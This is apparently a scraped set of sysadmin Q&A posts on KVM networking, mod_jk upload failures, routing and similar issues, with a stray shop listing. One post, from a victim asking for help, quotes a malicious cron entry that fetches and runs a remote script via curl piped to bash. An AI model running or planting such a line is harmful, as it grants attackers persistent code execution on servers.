virsh domifaddr shows nothing. Trying to setup IP address on guest similar to host

I am trying to get my guest machine to have an IP similar to its host machine. The address on the host is 10.75.1.239, the address on the guest I want to be: 10.75.1.187.

I can set up the guest to have the ip I want by editing the

/etc/sysconfig/network-scripts/ifcfg-eth0   BOOTPRO=none NAME=eth0 DEVICE=eth0 ONBOOT=yes IPADDR=10.75.1.187 GATEWAY=10.75.0.1 

The host machine’s /etc/sysconfig/network setup is as such:

NETWORKING=yes HOSTNAME=test-vm-server1 NTPSERVERARGS=iburst GATEWAY=10.75.0.1 

If i use virt-manager to pop onto the guest machine and do an ip a it shows the ip ass being what I set it to.

But if I am on the host machine of that guest, then doing an `ssh root@10.75.1.187′ comes back with:

ssh: connect to host 10.75.1.187 port 22: No route to host

I double checked that ssh is indeed running. Not sure what other configs for this cent OS guest on KVM (virt-manager) to test/check?

(Before I mucked with the file it had a 192.168.122.67 IP address I could ssh to.) What I didn’t test and wish I had was if it could see the outside network, I am guessing it could since I could ssh into it. This new box whose IP address is set to 10.75.1.187 I cannot ping out to anything really, so guessing something else I am missing in configuring the network. Not a lot of experience here so knowing what files to open and what edits to make is difficult.

How did installing this RPM create a file?

Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:

# rpm -ql getpagespeed-extras-release /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED /etc/yum.repos.d/getpagespeed-extras.repo # rpm -qf /etc/cron.d/sysstat2 file /etc/cron.d/sysstat2 is not owned by any package 

How did the RPM create the file and how do I see what else it did?

CentOS 7 hacked [duplicate]

This question already has an answer here:

  • How do I deal with a compromised server? 13 answers

A new file showed up at 07:07 EDT on one of my servers today:

# ll /etc/cron.d/sysstat2 -rw-r--r-- 1 root root 92 Jun 24 07:07 /etc/cron.d/sysstat2 # cat /etc/cron.d/sysstat2 53 * * * * root /bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1 

Luckily, whoever put it there screwed up, because every hour since I’ve received an email from cron saying:

/bin/sh: -c: line 0: syntax error near unexpected token `(' /bin/sh: -c: line 0: `/bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1' 

07:07 is when cron ran its dailys:

Jun 24 07:07:10 run-parts(/etc/cron.daily)[4989]: starting logrotate Jun 24 07:07:10 run-parts(/etc/cron.daily)[16936]: finished logrotate Jun 24 07:07:10 run-parts(/etc/cron.daily)[4989]: starting man-db.cron Jun 24 07:07:11 run-parts(/etc/cron.daily)[16947]: finished man-db.cron Jun 24 07:07:11 run-parts(/etc/cron.daily)[4989]: starting mlocate Jun 24 07:07:16 run-parts(/etc/cron.daily)[16958]: finished mlocate Jun 24 07:07:16 run-parts(/etc/cron.daily)[4989]: starting rkhunter 

only thing /var/log/messages shows for that time:

Jun 24 07:07:09 yum[5617]: Installed: getpagespeed-extras-release.noarch 7-1.el7.gps Jun 24 07:07:09 yum[5617]: Erased: getpagespeed-extras 

which is confirmed by /var/log/yum:

Jun 24 07:07:09 Installed: getpagespeed-extras-release.noarch 7-1.el7.gps Jun 24 07:07:09 Erased: getpagespeed-extras 

but the file does not appear to have actually came with that package:

# rpm -ql getpagespeed-extras-release /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED /etc/yum.repos.d/getpagespeed-extras.repo 

or any package:

# rpm -qf /etc/cron.d/sysstat2 file /etc/cron.d/sysstat2 is not owned by any package 

Server is setup for public key authentication only, and I just confirmed that by trying to connect from a different host:

#ssh -l root -p 57313 example.com Permission denied (publickey). 

yum update says I’m fully patched. I don’t know where to go from here.

Sporadic SSL_read errors when uploading large files through mod/jk with curl

I have a nightly backup script that has been working reliably for 6 years, and two months ago, it began to fail to upload to my archive server (only about 1 in 4 attempts succeed). This started to happen once the size of the backup file surpassed about 440MB (successful uploads take 20-40 seconds to complete). Other, smaller files (>200MB) are uploading successfully every time.

Here are the details of the file I am uploading:

-rw-r--r-- 1 backup backup 486948951 Jun 12 13:20 snapshot-20190612.zip 

These files are uploaded to my server with a curl PUT (see command below). The source server is an Amazon Linux instance in Virginia, and the destination server is an Amazon Linux instance in the Ohio (both are in the US East region).

The web service that handles the upload is an Apache HTTPD 2.4.39 + mod24_ssl/OpenSSL 1.0.2k -> mod_jk 1.2.42 -> Apache Tomcat 8.5.40 -> Artifactory 5.3.2 instance.


My mod/jk workers.properties file:

worker.list=main_ajp13_worker # Set properties for main_ajp13_worker (ajp13) worker.main_ajp13_worker.type=ajp13 worker.main_ajp13_worker.host=localhost worker.main_ajp13_worker.port=8009 

The following are the console output (authorization details scrubbed) from a failed upload, followed immediately by a successful upload:

-bash-4.2$   curl -v -k -u backup:PASSWORD -H X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3 -H X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10 -T snapshot-20190612.zip https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip *   Trying 123.222.100.132... * TCP_NODELAY set * Connected to repo.mydomain.org (123.222.100.132) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH * successfully set certificate verify locations: *   CAfile: /etc/pki/tls/certs/ca-bundle.crt   CApath: none * TLSv1.2 (OUT), TLS header, Certificate Status (22): * TLSv1.2 (OUT), TLS handshake, Client hello (1): * TLSv1.2 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256 * ALPN, server accepted to use http/1.1 * Server certificate: *  subject: OU=Domain Control Validated; OU=PositiveSSL Wildcard; CN=*.mydomain.org *  start date: May 28 00:00:00 2019 GMT *  expire date: May 27 23:59:59 2021 GMT *  issuer: C=GB; ST=Greater Manchester; L=Salford; O=Sectigo Limited; CN=Sectigo RSA Domain Validation Secure Server CA *  SSL certificate verify ok. * Server auth using Basic with user 'backup' > PUT /resource-snapshot/snapshot/20190612/snapshot-20190612.zip HTTP/1.1 > Host: repo.mydomain.org > Authorization: Basic DELETED_TOKEN > User-Agent: curl/7.61.1 > Accept: */* > X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3 > X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10 > Content-Length: 486948951 > Expect: 100-continue > < HTTP/1.1 100 Continue * OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 104 * Closing connection 0 curl: (56) OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 104  -bash-4.2$   curl -v -u backup:PASSWORD -H X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3 -H X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10 -T snapshot-20190612.zip https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip *   Trying 123.222.100.132... * TCP_NODELAY set * Connected to repo.mydomain.org (123.222.100.132) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH * successfully set certificate verify locations: *   CAfile: /etc/pki/tls/certs/ca-bundle.crt   CApath: none * TLSv1.2 (OUT), TLS header, Certificate Status (22): * TLSv1.2 (OUT), TLS handshake, Client hello (1): * TLSv1.2 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256 * ALPN, server accepted to use http/1.1 * Server certificate: *  subject: OU=Domain Control Validated; OU=PositiveSSL Wildcard; CN=*.mydomain.org *  start date: May 28 00:00:00 2019 GMT *  expire date: May 27 23:59:59 2021 GMT *  issuer: C=GB; ST=Greater Manchester; L=Salford; O=Sectigo Limited; CN=Sectigo RSA Domain Validation Secure Server CA *  SSL certificate verify ok. * Server auth using Basic with user 'backup' > PUT /resource-snapshot/snapshot/20190612/snapshot-20190612.zip HTTP/1.1 > Host: repo.mydomain.org > Authorization: Basic DELETED_TOKEN > User-Agent: curl/7.61.1 > Accept: */* > X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3 > X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10 > Content-Length: 486948951 > Expect: 100-continue > < HTTP/1.1 100 Continue * OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 104 * Closing connection 0 curl: (56) OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 104 

With a second (or often third or fourth) attempt of the upload, it eventually succeeds:

-bash-4.2$   curl -v -u backup:PASSWORD -H X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3 -H X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10 -T snapshot-20190612.zip https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip *   Trying 123.222.100.132... * TCP_NODELAY set * Connected to repo.mydomain.org (123.222.100.132) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH * successfully set certificate verify locations: *   CAfile: /etc/pki/tls/certs/ca-bundle.crt   CApath: none * TLSv1.2 (OUT), TLS header, Certificate Status (22): * TLSv1.2 (OUT), TLS handshake, Client hello (1): * TLSv1.2 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256 * ALPN, server accepted to use http/1.1 * Server certificate: *  subject: OU=Domain Control Validated; OU=PositiveSSL Wildcard; CN=*.mydomain.org *  start date: May 28 00:00:00 2019 GMT *  expire date: May 27 23:59:59 2021 GMT *  issuer: C=GB; ST=Greater Manchester; L=Salford; O=Sectigo Limited; CN=Sectigo RSA Domain Validation Secure Server CA *  SSL certificate verify ok. * Server auth using Basic with user 'backup' > PUT /resource-snapshot/snapshot/20190612/snapshot-20190612.zip HTTP/1.1 > Host: repo.mydomain.org > Authorization: Basic DELETED_TOKEN > User-Agent: curl/7.61.1 > Accept: */* > X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3 > X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10 > Content-Length: 486948951 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 201 201 < Date: Wed, 12 Jun 2019 13:22:46 GMT < Server: Apache < Strict-Transport-Security: max-age=15768000 < X-Artifactory-Id: 9e49bf90cd4b7700:7ba45cf1:16b1db56e4d:-8000 < Location: https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip < Transfer-Encoding: chunked < Content-Type: application/vnd.org.jfrog.artifactory.storage.itemcreated+json;charset=ISO-8859-1 < {   "repo" : "resource-snapshot",   "path" : "/snapshot/20190612/snapshot-20190612.zip",   "created" : "2019-06-12T13:23:05.805Z",   "createdBy" : "backup",   "downloadUri" : "https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip",   "mimeType" : "application/zip",   "size" : "486948951",   "checksums" : {     "sha1" : "6b9525bf9bb572ec7f70d0d474cb6533e0091bd3",     "md5" : "6da0c444ad1b53dc1cf06784e204cb10"   },   "originalChecksums" : {     "sha1" : "6b9525bf9bb572ec7f70d0d474cb6533e0091bd3",     "md5" : "6da0c444ad1b53dc1cf06784e204cb10"   },   "uri" : "https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip" * Connection #0 to host repo.mydomain.org left intact } 

The server logs aren’t particularly informative. Here are the relevant logs when an upload fails:

/var/log/httpd/ssl_request_log

[24/Jun/2019:12:17:45 +0000] 52.1.100.190 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "PUT /resource-snapshot/snapshot/20190612/snapshot-20190612.zip HTTP/1.1" - 

/var/log/httpd/repo.mydomain.org-ssl_access_log

140.1.100.101 - - [24/Jun/2019:12:17:45 +0000] "PUT /resource-snapshot/snapshot/20190612/snapshot-20190612.zip HTTP/1.1" 400 - 

catalina.out

No log entries.

/var/log/httpd/mod_jk.log

These are the logs when the mod/jk log level is set to info:

[Mon Jun 24 12:18:05 2019] [15679:140534117611584] [info] ajp_read_into_msg_buff::jk_ajp_common.c (1553): (main_ajp13_worker) receiving data from client failed. Connection aborted or network problems [Mon Jun 24 12:18:05 2019] [15679:140534117611584] [info] ajp_process_callback::jk_ajp_common.c (2105): (main_ajp13_worker) Reading from client aborted or client network problems [Mon Jun 24 12:18:05 2019] [15679:140534117611584] [info] ajp_service::jk_ajp_common.c (2778): (main_ajp13_worker) sending request to tomcat failed (unrecoverable), because of client read error (attempt=1) [Mon Jun 24 12:18:05 2019] [15679:140534117611584] [info] jk_handler::mod_jk.c (2988): Aborting connection for worker=main_ajp13_worker 

And here is the relevant part of the 2.4 million mod_jk log entries at the debug level, starting right at the HTTP 100 Continue and showing the very start of the file upload (you can see the magic number of the zip file, 50 4B 03 04):

[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0160    32 65 32 00 A0 08 00 09 34 39 36 32 37 38 36 30  - 2e2.....49627860 [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0170    33 00 00 06 45 78 70 65 63 74 00 00 0C 31 30 30  - 3...Expect...100 [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0180    2D 63 6F 6E 74 69 6E 75 65 00 0A 00 0F 41 4A 50  - -continue....AJP [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0190    5F 52 45 4D 4F 54 45 5F 50 4F 52 54 00 00 05 33  - _REMOTE_PORT...3 [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01a0    32 39 37 30 00 0A 00 0E 41 4A 50 5F 4C 4F 43 41  - 2970....AJP_LOCA [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01b0    4C 5F 41 44 44 52 00 00 0C 31 37 32 2E 33 31 2E  - L_ADDR...172.31. [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01c0    31 33 2E 39 36 00 0A 00 10 4A 4B 5F 4C 42 5F 41  - 13.96....JK_LB_A [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01d0    43 54 49 56 41 54 49 4F 4E 00 00 03 41 43 54 00  - CTIVATION...ACT. [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01e0    0A 00 0F 53 53 4C 5F 43 4C 49 45 4E 54 5F 43 45  - ...SSL_CLIENT_CE [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01f0    52 54 00 00 0F 53 53 4C 5F 43 4C 49 45 4E 54 5F  - RT...SSL_CLIENT_ [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0200    43 45 52 54 00 FF 00 00 00 00 00 00 00 00 00 00  - CERT............ [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_send_request::jk_ajp_common.c (1782): (main_ajp13_worker) request body to send 496278603 - request body to resend 0 [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_send_request::jk_ajp_common.c (1886): (main_ajp13_worker) sending 8186 bytes of request body [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): sending to ajp13 pos=4 len=8192 max=8192 [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0000    12 34 1F FC 1F FA 50 4B 03 04 14 00 00 00 08 00  - .4....PK........ [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0010    84 61 D8 4E 73 67 93 AF 7C 0A 00 00 E0 B0 00 00  - .a.Nsg..|....... [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0020    0A 00 1C 00 62 61 63 6B 75 70 2E 6C 6F 67 55 54  - ....backup.logUT [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0030    09 00 03 18 BE 10 5D 90 BD 10 5D 75 78 0B 00 01  - ......]...]ux... [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0040    04 1A 00 00 00 04 1A 00 00 00 ED 5C 4D 6F DC C8  - ...........\Mo.. [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0050    11 BD E7 57 34 74 4A 80 D8 80 77 17 8B 45 80 1C  - ...W4tJ...w..E..  .... [lots of encoded data trimmed out here, the next part shows re-filling the 8k buffer] ....  [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_get_message::jk_ajp_common.c (1462): received from ajp13 pos=0 len=3 max=8192E D7 E9 E6 DD BB  - 8...U?.er.>..... [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_get_message::jk_ajp_common.c (1462): 00000   06 1F FA 00 00 00 00 00 00 00 00 00 00 00 00 00  - ................. [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): sending to ajp13 pos=4 len=8192 max=8192 2E 40 41 4C 94  - ..$  z~YW.?1G.@AL. [Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0000    12 34 1F FC 1F FA C9 62 3E 48 C5 70 E9 05 E1 8D  - .4.....b>H.p....  .... [lots of encoded data trimmed out here, the next part shows where re-filling the 8k buffer fails] ....  [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 03e0    2D E5 36 F3 8C 12 8C 51 69 66 21 AE A5 58 BE 6E  - -.6....Qif!..X.n [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 03f0    57 F3 F4 EC CB E9 49 9B 59 44 AB FE 66 6E 67 DC  - W.....I.YD..fng. [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_connection_tcp_get_message::jk_ajp_common.c (1462): received from ajp13 pos=0 len=3 max=8192 [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_connection_tcp_get_message::jk_ajp_common.c (1462): 0000   06 1F FA 00 00 00 00 00 00 00 00 00 00 00 00 00  - ................ [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [info] ajp_read_into_msg_buff::jk_ajp_common.c (1553): (main_ajp13_worker) receiving data from client failed. Connection aborted or network problems [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [info] ajp_process_callback::jk_ajp_common.c (2105): (main_ajp13_worker) Reading from client aborted or client network problems [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [info] ajp_service::jk_ajp_common.c (2778): (main_ajp13_worker) sending request to tomcat failed (unrecoverable), because of client read error (attempt=1) [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_reset_endpoint::jk_ajp_common.c (851): (main_ajp13_worker) resetting endpoint with socket 24 (socket shutdown) [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_abort_endpoint::jk_ajp_common.c (821): (main_ajp13_worker) aborting endpoint with socket 24 [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] jk_shutdown_socket::jk_connect.c (932): About to shutdown socket 24 [127.0.0.1:38678 -> 127.0.0.1:8009] [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] jk_shutdown_socket::jk_connect.c (1005): shutting down the read side of socket 24 [127.0.0.1:38678 -> 127.0.0.1:8009] [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] jk_shutdown_socket::jk_connect.c (1016): Shutdown socket 24 [127.0.0.1:38678 -> 127.0.0.1:8009] and read 265 lingering bytes in 0 sec. [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_done::jk_ajp_common.c (3287): recycling connection pool for worker main_ajp13_worker and socket -1 [Mon Jun 24 14:37:28 2019] [17826:139891516274752] [info] jk_handler::mod_jk.c (2988): Aborting connection for worker=main_ajp13_worker [Mon Jun 24 14:38:24 2019] [17825:139891516274752] [debug] wc_shutdown::jk_worker.c (390): Shutting down worker main_ajp13_worker [Mon Jun 24 14:38:24 2019] [17825:139891516274752] [debug] jk_shm_close::jk_shm.c (745): Closed shared memory /var/log/httpd/mod_jk.shm.17823 childs=9 [Mon Jun 24 14:38:24 2019] [17877:139891516274752] [debug] wc_shutdown::jk_worker.c (390): Shutting down worker main_ajp13_worker 

In the above logs, I counted the number of times the 8k buffer was re-filled (36,856 times), and found that 302,071,776 bytes (62%) of the file was transferred before the error occurred.


My interpretation of the above logs

The SSL handshake is succeeding, and the error occurs after the HTTP 100 Continue, so I suspect that the file has been partially sent prior to the following messages in mod_jk.log:

  • receiving data from client failed. Connection aborted or network problems
  • sending request to tomcat failed (unrecoverable), because of client read error (attempt=1)

Since there are no errors in catalina.out, and mod/jk is complaining about a client read error, I believe this rules out Tomcat itself (and the web application, Artifactory).

Most of the comments I see with a Google search on the above mod/jk messages state that they are transient network errors, but I’m not buying that since these are file transfers between to EC2 instances in the same region. I am also interpreting this as not having anything to do with a connection timeout, as that would (I think) produce a “Connection timed out after n milliseconds” message.

As a final test, I bypassed Apache HTTPD and mod/jk by uploading directly to Tomcat via port 8443 (still using SSL). These requests succeeded every time. This leads me to believe that the problem is with Apache HTTPD and/or mod/jk, and is not caused by “transient network errors”.


My Question

Are there any configuration options that I should look into for HTTPD and/or mod/jk to eliminate these problems?

Alternatively, is there any way to tell curl (and/or mod/jk) to attempt to handle these failed buffer re-fills in a fault tolerant way, so that the uploads can successfully complete?

Dog Accessories Shop – Collars, Toys, Bowls, Grooming

Seller's Notes

Dog Accessories Shop – Collars, Toys, Bowls, Grooming
Great opportunity to own an online business. Fully ready & user-friendly shop with high profit margins. Dog Accessories – Collars, Leads, Toys, Bowls, Grooming and more…

———————————————————————–

No Stock Needed – Supplier directly dropshipping items to your customers.

User-Friendly Website – No maintenance and…

Dog Accessories Shop – Collars, Toys, Bowls, Grooming

Can i netcat through my gateway (NAT router) without configuring the router? [on hold]

I’m (kinda) new to networking. I don’t know if you understand my question. I wrote a simple program to listen to port 8080 on my pc. Netcat to localhost:8080 works perfectly fine (as expected), but now i want to reach it from the public internet. Ofcourse, i cant just netcat to my router at the same port, since my router didn’t open port 8080. Is it possible to use the netcat command to connect to my router and then to my private pc (from the internet), since i know my public and private ip. I imagine something like:

nc router_public_ip 113 my_private_ip 8080 

If it is possible with ssh/telnet or sth else, ill be happy with that too. Or do i need to setup a tunnel/vpn to accomplish that?

Chef, dynamic value for one host

I am configuring a proftpd server running on port 2222. I would like disable sftp on 22 which I can do by commenting the sftp line in sshd.config.

There is a ssh recipe part of another cookbook which drops sshd.config, but I am using different cookbook for proftp. How can we get sshd_config updated without 2 recipe runs?

writing logs in /var/adm/utmp vs /var/adm/utmpx

have 2 similar rhel6 servers but they behave different, while one creates login records in /var/adm/utmp, the other logs in /var/adm/utmpx, bot thave the same kernel and grub.conf configuration.

We’re planning on replacing these servers soon but still, it puzzles me.

here are the grub.conf files for each:

Server1:

# grub.conf generated by anaconda # # Note that you do not have to rerun grub after making changes to this file # NOTICE:  You have a /boot partition.  This means that #          all kernel and initrd paths are relative to /boot/, eg. #          root (hd0,0) #          kernel /vmlinuz-version ro root=/dev/mapper/rootVG-rootVol #          initrd /initrd-[generic-]version.img #boot=/dev/sda default=0 timeout=5 splashimage=(hd0,0)/grub/splash.xpm.gz hiddenmenu password --encrypted <removed> title Red Hat Enterprise Linux Server (2.6.32-754.14.2.el6.x86_64)     root (hd0,0)     kernel /vmlinuz-2.6.32-754.14.2.el6.x86_64 ro root=/dev/mapper/rootVG- rootVol rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=rootVG/rootVol  KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet     initrd /initramfs-2.6.32-754.14.2.el6.x86_64.img title Red Hat Enterprise Linux Server (2.6.32-754.10.1.el6.x86_64)         root (hd0,0)         kernel /vmlinuz-2.6.32-754.10.1.el6.x86_64 ro root=/dev/mapper/rootVG-rootVol rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=rootVG/rootVol  KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet         initrd /initramfs-2.6.32-754.10.1.el6.x86_64.img 

Here is server2:

# grub.conf generated by anaconda # # Note that you do not have to rerun grub after making changes to this file # NOTICE:  You have a /boot partition.  This means that #          all kernel and initrd paths are relative to /boot/, eg. #          root (hd0,0) #          kernel /vmlinuz-version ro root=/dev/mapper/rootVG-rootVol #          initrd /initrd-[generic-]version.img #boot=/dev/sda default=0 timeout=5 splashimage=(hd0,0)/grub/splash.xpm.gz hiddenmenu password --encrypted <removed> title Red Hat Enterprise Linux Server (2.6.32-754.14.2.el6.x86_64)     root (hd0,0)     kernel /vmlinuz-2.6.32-754.14.2.el6.x86_64 ro root=/dev/mapper/rootVG-rootVol rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=rootVG/rootVol  KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet     initrd /initramfs-2.6.32-754.14.2.el6.x86_64.img title Red Hat Enterprise Linux Server (2.6.32-754.10.1.el6.x86_64)     root (hd0,0)     kernel /vmlinuz-2.6.32-754.10.1.el6.x86_64 ro root=/dev/mapper/rootVG-rootVol rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=rootVG/rootVol  KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet     initrd /initramfs-2.6.32-754.10.1.el6.x86_64.img 

Task Scheduler trigger expire isn’t working

The task is setup through GPO as a immediate task. It ends in less than 30 seconds and it should delete itself. Seems to be affecting only Windows servers 2016. It deletes itself on Windows server 2008 R2. Any suggestions on how to debug why it isn’t deleting?

It looks like Task scheduler ID becomes 00000. During the Task Completed it has a unique ID.

Task Scheduler successfully finished “{058c45b6-e31c-401a-b70e-2a90a2c9c110}” instance of the “\task_name” task for user “NT AUTHORITY\SYSTEM”.

Task scheduler screenshot

Configure multiple interfaces on RHEL7 with routing

We have a reverse proxy which have 2 network interfaces. One with a public IP and one with a private IP. So clients use the extern interface and web servers the interne one. Bu for the admins it’s tricky beacause we want to exploit the revser proxy with SSH using the private interface and use the websites like a regular user via the public interface. Here a descriptive diagram :

Network scheme

So here my network table on the reverse proxy :

[root@reverse ~]# route -n Kernel IP routing table Destination     Gateway         Genmask         Flags Metric Ref    Use Iface 0.0.0.0         GW_INT          0.0.0.0         UG    101    0        0 ens224 0.0.0.0         GW_EXT          0.0.0.0         UG    102    0        0 ens256 NETWORK_INT     0.0.0.0         255.255.255.0   U     101    0        0 ens224 NETWORK_EXT     0.0.0.0         255.255.255.224 U     102    0        0 ens256 

Previously we used the net.ipv4.conf.all.rp_filter parameter in sysctl to do asymmetric routing and communicate with both interfaces. But now there is a new network equipment (Palo Alto) which blocks the asymmetric routing.

So now i can access only to the private one (i think because of the metric), i am taking a time out on the public interface.

I think this a way to tell the server : the traffic which come for one interface goes out with the same interface (without being redirect to the other interface). Is it possible ?

Thank you for advance, Regards.